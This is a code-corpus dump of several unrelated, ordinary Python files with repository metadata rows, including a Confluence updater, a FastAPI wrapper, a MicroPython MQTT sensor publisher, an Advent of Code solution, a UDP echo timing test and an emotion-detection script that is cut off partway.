TENSORBOARD_LOGS_LOCAL = '../logs_tensorboard'
os.makedirs(TENSORBOARD_LOGS_LOCAL, exist_ok=True)
# where to look for events files - experiment names
base_paths = [
# Main initial experiments - all weights are updated
'small_standard_vocab',
'base_standard_vocab',
'large_standard_vocab',
'small_custom_sentencepiece_vocab',
'base_custom_sentencepiece_vocab',
'large_custom_sentencepiece_vocab',
# Only embeddings are updated
'small_embeddings_only_standard_vocab',
'base_embeddings_only_standard_vocab',
'large_embeddings_only_standard_vocab',
'small_embeddings_only_custom_sentencepiece_vocab',
'base_embeddings_only_custom_sentencepiece_vocab',
'large_embeddings_only_custom_sentencepiece_vocab',
# Double batch size for large (128 = 64 * 2)
'large_batchsize_128_custom_sentencepiece_vocab',
'large_batchsize_128_standard_vocab',
]
# all paths have the scructure
for base_path in base_paths:
size = base_path.split('_')[0]
full_path = os.path.join(GCS_BUCKET, base_path, 'models', size)
download_dir = os.path.join(TENSORBOARD_LOGS_LOCAL, base_path)
if not os.path.exists(download_dir):
os.makedirs(download_dir, exist_ok=True)
print(f'Downloading files from {full_path} to {download_dir}')
for file in tqdm.tqdm(tf.gfile.Glob(os.path.join(full_path,
"events.*"))):
tf.gfile.Copy(file,
os.path.join(download_dir, os.path.basename(file)),
overwrite=False)
else:
print(f'{base_path} logs already downloaded. Delete folder '
f'{download_dir} and run script to download again')
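# Once the event files are downloaded, they can be inspected locally with the
# standard TensorBoard CLI (illustrative invocation):
#
#     tensorboard --logdir ../logs_tensorboard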
| 38.531915 | 77 | 0.699613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 929 | 0.512976 |
dc0e5e9f0de144528e9e2fd2507b7d3b024c5594 | 1,408 | py | Python | tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | c24ce94fa88f15ebc6cc2dbda6852c6d17094fc6 | [
"Apache-2.0"
]
| 83 | 2019-08-20T09:34:27.000Z | 2022-03-24T13:42:36.000Z | tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | c24ce94fa88f15ebc6cc2dbda6852c6d17094fc6 | [
"Apache-2.0"
]
| 15 | 2019-08-20T06:34:16.000Z | 2020-05-17T21:22:52.000Z | tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | c24ce94fa88f15ebc6cc2dbda6852c6d17094fc6 | [
"Apache-2.0"
]
| 6 | 2020-02-09T09:35:17.000Z | 2022-03-19T18:43:17.000Z | import base64
import requests
class RemotePkcs1Signer(object):
""" Client-side Signer subclass, that calls the Signing Service over HTTP to sign things """
# standard headers for request
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
def __init__(self, host, port, key, algorithm="SIGNATURE_RSA_PKCS1_SHA256", keyfile=None):
"""
:param host: host of the remote HTTP service
:param port: port of the remote HTTP service
:param key: see signing_service.py, in our case we use the hash of the related cert to identify the key
:param algorithm: which algorithm to use
:param keyfile: unused, this is a wart :(
"""
self.endpoint = "http://{}:{}/".format(host, port)
self.key = key
self.algorithm = algorithm
def sign(self, data):
plaintext_base64 = base64.b64encode(data)
plaintext_key = u'0'
payload = {
"key": self.key,
"plaintext": [{
"key": plaintext_key,
"value": plaintext_base64
}],
"algorithm": self.algorithm
}
response = requests.post(self.endpoint,
headers=self.__class__.headers,
json=payload).json()
signature = base64.b64decode(response[u'signature'][plaintext_key])
return signature
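# Usage sketch (illustrative; assumes a compatible signing service is reachable
# on localhost:8080 and that `key` is the certificate-hash identifier it expects):
#
#     signer = RemotePkcs1Signer(host='localhost', port=8080, key='deadbeef')
#     signature = signer.sign(b'data to sign')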
| 32.744186 | 106 | 0.599432 | 1,375 | 0.976563 | 0 | 0 | 0 | 0 | 0 | 0 | 572 | 0.40625 |
dc0f94e928edc42769b1d0d49b60f125df3ce1e6 | 4,497 | py | Python | architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
]
| 1 | 2021-08-13T01:37:29.000Z | 2021-08-13T01:37:29.000Z | architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
]
| null | null | null | architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
]
| 1 | 2021-07-19T07:57:54.000Z | 2021-07-19T07:57:54.000Z | import logging
import re
from celery import shared_task
from django.conf import settings
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.template.loader import get_template
from django.urls import reverse
from django.utils import timezone
from architecture_tool_django.utils.confluence_wrapper import (
MyConfluence,
tiny_to_page_id,
)
from .models import Node
logger = logging.getLogger(__name__)
def get_node_attrs(instance):
attributes = {}
schema_properties = instance.nodetype.attribute_schema.schema["properties"]
for key, value in instance.attributeSet.items():
if key in schema_properties:
if "title" in schema_properties[key]:
attributes[schema_properties[key]["title"]] = value
else:
attributes[key] = value
attributes["Domain/Subsystem or Subdomain"] = ""
attributes["Service/Component Responsible"] = instance.attributeSet["name"]
attributes["Contact"] = ""
attributes["Service/Component Status"] = instance.attributeSet["status"]
return attributes
def get_outbound_edges(instance, base_url):
outbound_edges = {}
for edge in instance.outbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in outbound_edges:
outbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.target.key])
name = edge.target.attributeSet.get("name")
item = f'(<a href="{url}">{edge.target.key}</a>) {name}'
outbound_edges[edgetype].append(item)
return outbound_edges
def get_inbound_edges(instance, base_url):
inbound_edges = {}
for edge in instance.inbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in inbound_edges:
inbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.source.key])
name = edge.source.attributeSet.get("name")
item = f'(<a href="{url}">{edge.source.key}</a>) {name}'
inbound_edges[edgetype].append(item)
return inbound_edges
def update_confluence(title, context, doc_url):
new_spec = get_template("misc/confluence_page.html").render(context)
tiny = re.sub(r".*\/", "", doc_url)
page_id = tiny_to_page_id(tiny)
confluence = MyConfluence()
# page = confluence.get_page_by_id(page_id, expand="version,body.storage")
# version = int(re.sub(r".*\/", "", r.json()["version"]["_links"]["self"]))
confluence.update_page(
page_id,
title,
new_spec,
parent_id=None,
type="page",
representation="storage",
minor_edit=False,
)
def update_confluence_for_component(nodekey):
instance = get_object_or_404(Node, pk=nodekey)
doc_system = instance.attributeSet.get("primaryDocumentationSystem")
doc_url = instance.attributeSet.get("docupediaPage")
if doc_system != "ARC001" or doc_url == "":
return
base_url = settings.ARCHITECTURE_TOOL_URL
attributes = get_node_attrs(instance)
outbound_edges = get_outbound_edges(instance, base_url)
inbound_edges = get_inbound_edges(instance, base_url)
if "isDomainOf" in outbound_edges:
attributes["Domain/Subsystem or Subdomain"] = outbound_edges["isDomainOf"][0]
if "isResponsibleOf" in outbound_edges:
attributes["Service/Component Responsible"] = outbound_edges["isResponsibleOf"][
0
]
if "isContactOf" in outbound_edges:
attributes["Contact"] = ", ".join(outbound_edges["isContactOf"])
image_url = "https://www.xxx.com"
title = f'({instance.key}) {instance.attributeSet["name"]} ({instance.attributeSet["status"]})'
context = {
"base_url": base_url,
"node": instance,
"attributes": attributes,
"inbound_edges": inbound_edges,
"outbound_edges": outbound_edges,
"image_url": image_url,
}
update_confluence(title, context, doc_url)
@shared_task
def update_component_page_task(nodekey):
update_confluence_for_component(nodekey)
logger.info(f"Task: Page for {nodekey} updated!")
@shared_task
def update_components_page_task():
one_h_ago = timezone.now() - timezone.timedelta(hours=1)
nodes = Node.objects.filter(Q(nodetype="component") & Q(updated__gte=one_h_ago))
for node in nodes:
update_confluence_for_component(node.key)
logger.info("Task: All components updated!")
| 32.824818 | 99 | 0.683344 | 0 | 0 | 0 | 0 | 467 | 0.103847 | 0 | 0 | 957 | 0.212809 |
dc107c520e6be07939c0ec67b42b5fccd394dfb1 | 3,195 | py | Python | crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 349ebbd5676d3ef3ccf889ec3849b2f1cff4be32 | [
"MIT"
]
| 4 | 2019-04-08T23:24:30.000Z | 2021-12-22T16:42:12.000Z | crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 349ebbd5676d3ef3ccf889ec3849b2f1cff4be32 | [
"MIT"
]
| 12 | 2017-12-18T04:27:14.000Z | 2021-06-10T18:05:46.000Z | crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 349ebbd5676d3ef3ccf889ec3849b2f1cff4be32 | [
"MIT"
]
| 3 | 2019-08-12T14:36:04.000Z | 2020-10-17T20:54:09.000Z | from crosswalk.authentication import AuthenticatedView
from crosswalk.models import Domain, Entity
from crosswalk.serializers import EntitySerializer
from crosswalk.utils import import_class
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import status
from rest_framework.response import Response
class AliasOrCreate(AuthenticatedView):
def post(self, request, domain):
"""
Create an alias if an entity is found above a certain match threshold
or create a new entity.
"""
user = request.user
data = request.data.copy()
query_field = data.get("query_field")
query_value = data.get("query_value")
block_attrs = data.get("block_attrs", {})
create_attrs = data.get("create_attrs", {})
return_canonical = data.get("return_canonical", True)
threshold = data.get("threshold")
scorer_class = data.get("scorer", "fuzzywuzzy.default_process")
try:
scorer = import_class("crosswalk.scorers.{}".format(scorer_class))
except ImportError:
return Response(
"Invalid scorer.", status=status.HTTP_400_BAD_REQUEST
)
try:
domain = Domain.objects.get(slug=domain)
except ObjectDoesNotExist:
return Response(
"Domain not found.", status=status.HTTP_404_NOT_FOUND
)
# Find the best match for a query
entities = Entity.objects.filter(domain=domain)
entities = entities.filter(attributes__contains=block_attrs)
entity_values = [e.attributes[query_field] for e in entities]
match, score = scorer(query_value, entity_values)
entities = entities.filter(
**{"attributes__{}".format(query_field): match}
)
if entities.count() > 1:
return Response(
"More than one alias candiate for entity.",
status=status.HTTP_403_FORBIDDEN,
)
entity = entities.first()
attributes = {
**{query_field: query_value},
**block_attrs,
**create_attrs,
}
if entity.attributes == attributes:
return Response(
"Entity appears to already exist.",
status=status.HTTP_409_CONFLICT,
)
if score > threshold:
aliased = True
alias = Entity(
attributes=attributes,
alias_for=entity,
created_by=user,
domain=domain,
)
alias.save()
if return_canonical:
while entity.alias_for:
entity = entity.alias_for
else:
aliased = False
entity = Entity(
attributes=attributes, created_by=user, domain=domain
)
entity.save()
return Response(
{
"entity": EntitySerializer(entity).data,
"created": True,
"aliased": aliased,
"match_score": score,
},
status=status.HTTP_200_OK,
)
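# Illustrative request payload for this view (field names taken from the code
# above; the URL, domain and values are made up):
#
#     POST /<domain>/alias-or-create/
#     {
#         "query_field": "name",
#         "query_value": "Kalifornia",
#         "block_attrs": {"postal_code": "CA"},
#         "create_attrs": {"source": "import"},
#         "threshold": 90,
#         "scorer": "fuzzywuzzy.default_process"
#     }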
| 32.272727 | 78 | 0.571831 | 2,868 | 0.897653 | 0 | 0 | 0 | 0 | 0 | 0 | 465 | 0.14554 |
dc10e734b445882a7de1ca38ba65c2b849b9fe68 | 3,629 | py | Python | hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 08388af0328f225fc3066cf09b8043c30cb900e3 | [
"MIT"
]
| null | null | null | hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 08388af0328f225fc3066cf09b8043c30cb900e3 | [
"MIT"
]
| null | null | null | hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 08388af0328f225fc3066cf09b8043c30cb900e3 | [
"MIT"
]
| 2 | 2021-07-26T17:10:19.000Z | 2021-09-02T00:13:17.000Z | from fastapi import FastAPI, Response, WebSocket, WebSocketDisconnect
from threading import Thread
from .server import Server
from .errors import HoistExistsError
from .error import Error
from .version import __version__
from .flask_wrapper import HTML
import uvicorn
from typing import List, Callable
from fastapi.responses import HTMLResponse, JSONResponse
class FastAPIWrapper:
"""Wrapper for FastAPI."""
@staticmethod
def make_server(*args, **kwargs) -> FastAPI:
"""Generate a FastAPI server."""
return FastAPI(*args, **kwargs)
def get_response(self, auth: str, tokens: List[str], callback: Callable, arg: str, response: Response) -> dict:
if not auth in tokens:
response.status_code = 401
return {'ERROR': 'unauthorized'}
resp, success = callback(arg)
if isinstance(resp, Error):
response.status_code = resp.code
return {'ERROR': resp.message}
if not success:
response.status_code = 500
return {'ERROR': resp}
else:
return {'RESPONSE': resp}
def add_hoist(self, app: FastAPI, handle_errors: bool = True, auth: list = [""], premade_pages: bool = True) -> FastAPI:
"""Function for setting up hoist on an app."""
if hasattr(app, 'HOIST_INTERNALSERVER'):
raise HoistExistsError('hoist is already set up on app')
app.HOIST_INTERNALSERVER = Server(app, handle_errors)
tokens: List[str] = auth.copy() # to stop collisions
app.HOIST_AUTH = tokens
app.HOIST_WRAPPER = self
@app.exception_handler(422)
def invalid_args(req, exc) -> JSONResponse:
return JSONResponse({"ERROR": "Invalid arguments."}, status_code = 400)
@app.post('/hoist/send')
def http_send(msg: str, auth: str, response: Response) -> dict:
return self.get_response(auth, tokens, app.HOIST_INTERNALSERVER._received, msg, response)
if premade_pages:
@app.get('/hoist')
def home_get() -> str:
return HTMLResponse(
HTML.replace('{{ version }}', __version__)
)
@app.post('/hoist')
def hoist_post() -> str:
return {'RESPONSE': f'Version {__version__}'}
return app
@staticmethod
def run_server(app: FastAPI, ip: str, port: int) -> None:
"""Function for running a FastAPI server."""
uvicorn.run(app, host = ip, port = port)
def thread_server(self, app: FastAPI, ip: str, port: int) -> FastAPI:
"""Function for running a flask app with a thread."""
server: Thread = Thread(target = self.run_server, args = (app, ip, port))
server.start()
return app
def add_socket(self, app: FastAPI, route: str) -> None:
"""Function for adding a socket to a FastAPI server."""
@app.websocket(route)
async def ws(websocket: WebSocket, response: Response):
sock = app.HOIST_SOCKETS[route]
for i in sock.connect:
i()
await websocket.accept()
while True:
try:
data = await websocket.receive_text()
resp = self.get_response("", app.HOIST_AUTH, sock._received, data, response)
await websocket.send_json(resp)
except WebSocketDisconnect:
for i in sock.disconnect:
i()
break
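# Usage sketch for the wrapper above (minimal and illustrative; the token and
# port are made up):
#
#     wrapper = FastAPIWrapper()
#     app = wrapper.make_server()
#     app = wrapper.add_hoist(app, auth=['my-secret-token'])
#     wrapper.run_server(app, ip='0.0.0.0', port=5000)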
| 34.894231 | 124 | 0.58005 | 3,268 | 0.900524 | 0 | 0 | 1,612 | 0.4442 | 589 | 0.162304 | 487 | 0.134197 |
dc110c5732b9e3f42c8a0c8715b260a938e9705c | 4,874 | py | Python | network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
]
| 3 | 2017-09-03T17:17:44.000Z | 2017-12-10T12:26:46.000Z | network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
]
| null | null | null | network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
]
| 2 | 2017-10-01T01:10:55.000Z | 2018-07-15T19:49:29.000Z | # This file is executed on every boot (including wake-boot from deepsleep)
# 2017-1210 PePo send timestamp and temperature (Celsius) to MQTT-server on BBB
# 2017-1105 PePo add _isLocal: sensor data to serial port (False) of stored in file (True)
# 2017-0819 PePo add sensor, led and print to serial port
# 2017-0811 PePo updated: no debug, disable webrepl,
# source: https://youtu.be/yGKZOwzGePY - Tony D! MP ESP8266 HTTP examples
print('main.py executing...')
# connect to a personal Wifi network ---------
import wifinetwork as wifi
# TODO: JSON config-file with ssid:ww entry/entries
#wifi.connectTo("PePoDevNet", wifi.readPasswordFrom('pepodevnet.txt'))
print('Wifi: connect to PePoDevNet...')
wifi.connectTo("PePoDevNet")
# set the time from nptime ---------
#print('TODO: get current time from the web...')
print('getting time from the web...')
import nptime
print('... UTC time:', nptime.settime())
#print('\tTODO -local time')
# --- SUMMERTIME or not (=WINTERTIME) ---------------
_isSummerTime = False
print('... Summertime:', _isSummerTime)
# temperature ---------
import class_ds18b20
#get sensor at GPIO14
ds = class_ds18b20.DS18B20(14)
# --- location ---------------
_LOCATION = 'studyroom'
#7-segment display
import tm1637
from machine import Pin
import math
# create tm
tm = tm1637.TM1637(clk=Pin(5), dio=Pin(4))
#print('tm: ', tm)
def display_tm1637(t):
#debug: print('display: temp=', t)
tm.temperature( math.floor(t) )
# helper function: returns temperature-record as string
def temp_record(timestamp, temp):
# timestamp[3] correction for Summertime or not
def _tc(t):
correction = 1
if _isSummerTime:
correction = 2
return t + correction
data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
return data
#''' store data in file temperature.txt
# default: 1 measuremtn per 30 seconds
def saveT2File(dt=30.0):
import time
import utime
print('saveT2File({0}) entered...'.format(dt))
# helper function to add sensor data record to file
def write_record(timestamp, temp):
f = open('temperature.txt', 'a') #append mode
#data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
f.write( temp_record(timestamp, temp) )
f.close()
while True:
#FUTURE: led.on()
timestamp = utime.localtime()
temp = ds.celsius
display_tm1637(temp) #display
write_record(timestamp, temp) #write in file
#FUTURE: led.off()
time.sleep(dt)
# send data to MQTT-server
def send2Server(dt=30.0):
import time
import utime
from umqtt.simple import MQTTClient
#print('send2server({0}) entered...'.format(dt))
#MQTT configuration -----------------
mqtt_server = '192.168.178.40' #ip-address of MQTT-server
TOPIC_TEST = b'topic/test' # topic: debug message
TOPIC_VALUE = b'topic/value' # topic: temperature value
TOPIC = b'topic/temperature' # topic: temp-record
#helper: sends data to MTQQ-server: connect-send payload-disconnet
def sendMQTT(payload, topic=TOPIC, server= mqtt_server):
#print('sendMQTT():', payload)
c = MQTTClient("umqtt_client", server)
c.connect() #success: returns 0
#debug: conn = c.connect()
#print('MQTT connection:', conn)
c.publish(topic, payload)
c.disconnect()
#broadcasting via topic:test
payload = b'MQTT-server: {0},\nTOPIC: {1},\nCollecting temperatures...'.format(mqtt_server, TOPIC) #debug
sendMQTT(payload, TOPIC_TEST)
print(payload)
while True:
timestamp = utime.localtime()
temp = ds.celsius
#print('temperature on display')
display_tm1637(temp)
#print('broadcast temp-record')
payload = temp_record(timestamp, temp)
sendMQTT(payload)
#print('broadcast temp-value')
payload = b'{0}'.format(temp)
sendMQTT(payload, TOPIC_VALUE)
time.sleep(dt)
#main run() - by-default 1 measurement per 30 seconds
def run(dt=30.0):
#store data local (True) or send to server (False)
_isLocal = False;
try:
if _isLocal:
# watch out: file can be very large overtime
saveT2File(dt)
else:
send2Server(dt)
except:
print('collecting temperature data intercepted')
pass
# go ahead and start getting, sending/storing the sensor data
if __name__ == "__main__":
run(60.0) # 1 measurement per minute
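# Host-side counterpart (a sketch, not part of this MicroPython script): a small
# paho-mqtt (1.x style API) subscriber that prints whatever the board publishes.
# The broker address and topics match the configuration above.
#
#     import paho.mqtt.client as mqtt
#
#     def on_message(client, userdata, msg):
#         print(msg.topic, msg.payload.decode())
#
#     client = mqtt.Client()
#     client.on_message = on_message
#     client.connect('192.168.178.40', 1883)
#     client.subscribe('topic/#')
#     client.loop_forever()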
| 33.383562 | 164 | 0.622897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,581 | 0.529545 |
dc11cc17aee754089dc4fb18a3e6534b5f45cf92 | 1,724 | py | Python | 2015/07.py | Valokoodari/advent-of-code | c664987f739e0b07ddad34bad87d56768556a5a5 | [
"MIT"
]
| 2 | 2021-12-27T18:59:11.000Z | 2022-01-10T02:31:36.000Z | 2015/07.py | Valokoodari/advent-of-code-2019 | c664987f739e0b07ddad34bad87d56768556a5a5 | [
"MIT"
]
| null | null | null | 2015/07.py | Valokoodari/advent-of-code-2019 | c664987f739e0b07ddad34bad87d56768556a5a5 | [
"MIT"
]
| 2 | 2021-12-23T17:29:10.000Z | 2021-12-24T03:21:49.000Z | #!/usr/bin/python3
lines = open("inputs/07.in", "r").readlines()
for i,line in enumerate(lines):
lines[i] = line.split("\n")[0]
l = lines.copy()
wires = {}
def func_set(p, i):
if p[0].isdigit():
wires[p[2]] = int(p[0])
lines.pop(i)
elif p[0] in wires.keys():
wires[p[2]] = wires[p[0]]
lines.pop(i)
def func_and(p, i):
if p[0].isdigit() and p[2] in wires.keys():
wires[p[4]] = int(p[0]) & wires[p[2]]
lines.pop(i)
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] & wires[p[2]]
lines.pop(i)
def func_or(p, i):
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] | wires[p[2]]
lines.pop(i)
def func_rshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] >> int(p[2])
lines.pop(i)
def func_lshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] << int(p[2])
lines.pop(i)
def func_not(p, i):
if p[1] in wires.keys():
wires[p[3]] = 65535 - wires[p[1]]
lines.pop(i)
def run():
i = 0
while len(lines) > 0:
parts = lines[i].split(" ")
if "AND" in parts:
func_and(parts, i)
elif "NOT" in parts:
func_not(parts, i)
elif "RSHIFT" in parts:
func_rshift(parts, i)
elif "LSHIFT" in parts:
func_lshift(parts, i)
elif "OR" in parts:
func_or(parts, i)
else:
func_set(parts, i)
i += 1
if i >= len(lines):
i = 0
run()
print("Part 1: " + str(wires["a"]))
lines = l
wires = {"b": wires["a"]}
run()
print("Part 2: " + str(wires["a"]))
| 23.297297 | 53 | 0.487239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 104 | 0.060325 |
dc1360cdb290733689a5e8387a3d39ce467c6a9c | 1,659 | py | Python | soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 60600fb826c06362182ebff00f3031e87ac45f7c | [
"BSD-3-Clause"
]
| 56 | 2016-12-25T22:29:00.000Z | 2022-01-06T04:42:00.000Z | soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 60600fb826c06362182ebff00f3031e87ac45f7c | [
"BSD-3-Clause"
]
| 244 | 2021-04-05T03:22:25.000Z | 2022-03-31T16:47:36.000Z | soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 60600fb826c06362182ebff00f3031e87ac45f7c | [
"BSD-3-Clause"
]
| 7 | 2017-01-24T23:38:07.000Z | 2022-01-19T16:58:08.000Z | import socket
import time
import numpy
# This script sends a message to the board, at IP address and port given by
# server_address, using User Datagram Protocol (UDP). The board should be
# programmed to echo back UDP packets sent to it. The time taken for num_samples
# echoes is measured.
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.0.59', 7)
sock.bind(('', 7))
message = 'this is a message of length 80 chars. asdfghjklasdfghjklasdfghjklasdfghjkl ++++'.encode()
num_samples = 500
times = []
try:
# Send data
print('Sending "{}"'.format(message))
print('Measuring time taken for {} echoes'.format(num_samples))
total_time = 0
for i in range(num_samples):
t0 = time.perf_counter()
sent = sock.sendto(message, server_address)
# Receive response
data, server = sock.recvfrom(4096)
t1 = time.perf_counter()
dt = t1 - t0
total_time += dt
#print('received "{}"'.format(data))
times.append(dt)
f = open('times', 'a')
try:
f.write('\n')
for i in range(num_samples):
f.write('{},'.format(times[i]))
finally:
f.close()
times_array = numpy.array(times)
print('Took {} seconds for {} samples'.format(total_time, num_samples))
print('Average echo time: {} seconds'.format(numpy.average(times_array)))
print('Standard deviation: {} seconds'.format(numpy.std(times_array)))
print('Maximum: {} seconds, Minimum: {} seconds'.format(numpy.amax(times_array), numpy.amin(times_array)))
finally:
print('Closing socket')
sock.close()
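# For bench testing without the board, a minimal UDP echo peer can run on another
# machine (a sketch; the bind port must match server_address above):
#
#     import socket
#     echo = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     echo.bind(('0.0.0.0', 7))
#     while True:
#         data, addr = echo.recvfrom(4096)
#         echo.sendto(data, addr)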
| 27.65 | 110 | 0.650995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 654 | 0.394213 |
dc140fb927ee173544f8803200f7806b0546c054 | 16,058 | py | Python | test.py | keke185321/emotions | f7cef86c20880b99469c9a35b071d6062e56ac40 | [
"MIT"
]
| 58 | 2017-04-04T18:59:36.000Z | 2022-02-16T14:54:09.000Z | test.py | keke185321/emotions | f7cef86c20880b99469c9a35b071d6062e56ac40 | [
"MIT"
]
| 4 | 2017-06-28T13:56:04.000Z | 2021-07-02T03:42:21.000Z | test.py | keke185321/emotions | f7cef86c20880b99469c9a35b071d6062e56ac40 | [
"MIT"
]
| 26 | 2017-08-22T14:41:28.000Z | 2022-03-08T05:41:03.000Z | #!/usr/bin/env python
#
# This file is part of the Emotions project. The complete source code is
# available at https://github.com/luigivieira/emotions.
#
# Copyright (c) 2016-2017, Luiz Carlos Vieira (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import argparse
import cv2
import numpy as np
from collections import OrderedDict
from datetime import datetime, timedelta
from faces import FaceDetector
from data import FaceData
from gabor import GaborBank
from emotions import EmotionsDetector
#---------------------------------------------
class VideoData:
"""
Helper class to present the detected face region, landmarks and emotions.
"""
#-----------------------------------------
def __init__(self):
"""
Class constructor.
"""
self._faceDet = FaceDetector()
'''
The instance of the face detector.
'''
self._bank = GaborBank()
'''
The instance of the bank of Gabor filters.
'''
self._emotionsDet = EmotionsDetector()
'''
The instance of the emotions detector.
'''
self._face = FaceData()
'''
Data of the last face detected.
'''
self._emotions = OrderedDict()
'''
Data of the last emotions detected.
'''
#-----------------------------------------
def detect(self, frame):
"""
Detects a face and the prototypic emotions on the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to perform the detections from.
Returns
-------
ret: bool
Indication of success or failure.
"""
ret, face = self._faceDet.detect(frame)
if ret:
self._face = face
# Crop just the face region
frame, face = face.crop(frame)
# Filter it with the Gabor bank
responses = self._bank.filter(frame)
# Detect the prototypic emotions based on the filter responses
self._emotions = self._emotionsDet.detect(face, responses)
return True
else:
self._face = None
return False
#-----------------------------------------
def draw(self, frame):
"""
Draws the detected data of the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to draw the information to.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
white = (255, 255, 255)
yellow = (0, 255, 255)
red = (0, 0, 255)
empty = True
# Plot the face landmarks and face distance
x = 5
y = 0
w = int(frame.shape[1]* 0.2)
try:
face = self._face
empty = face.isEmpty()
face.draw(frame)
except:
pass
# Plot the emotion probabilities
try:
emotions = self._emotions
if empty:
labels = []
values = []
else:
labels = list(emotions.keys())
values = list(emotions.values())
bigger = labels[values.index(max(values))]
# Draw the header
text = 'emotions'
size, _ = cv2.getTextSize(text, font, scale, thick)
y += size[1] + 20
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
y += 5
cv2.line(frame, (x,y), (x+w,y), black, 1)
size, _ = cv2.getTextSize('happiness', font, scale, thick)
t = size[0] + 20
w = 150
h = size[1]
for l, v in zip(labels, values):
lab = '{}:'.format(l)
val = '{:.2f}'.format(v)
size, _ = cv2.getTextSize(l, font, scale, thick)
# Set a red color for the emotion with bigger probability
color = red if l == bigger else yellow
y += size[1] + 15
p1 = (x+t, y-size[1]-5)
p2 = (x+t+w, y-size[1]+h+5)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the filled rectangle proportional to the probability
p2 = (p1[0] + int((p2[0] - p1[0]) * v), p2[1])
cv2.rectangle(frame, p1, p2, color, -1)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the emotion label
cv2.putText(frame, lab, (x, y), font, scale, black, glow)
cv2.putText(frame, lab, (x, y), font, scale, color, thick)
# Draw the value of the emotion probability
cv2.putText(frame, val, (x+t+5, y), font, scale, black, glow)
cv2.putText(frame, val, (x+t+5, y), font, scale, white, thick)
except Exception as e:
print(e)
pass
#---------------------------------------------
def main(argv):
"""
Main entry of this script.
Parameters
------
argv: list of str
Arguments received from the command line.
"""
# Parse the command line
args = parseCommandLine(argv)
# Loads the video or starts the webcam
if args.source == 'cam':
video = cv2.VideoCapture(args.id)
if not video.isOpened():
print('Error opening webcam of id {}'.format(args.id))
sys.exit(-1)
fps = 0
frameCount = 0
sourceName = 'Webcam #{}'.format(args.id)
else:
video = cv2.VideoCapture(args.file)
if not video.isOpened():
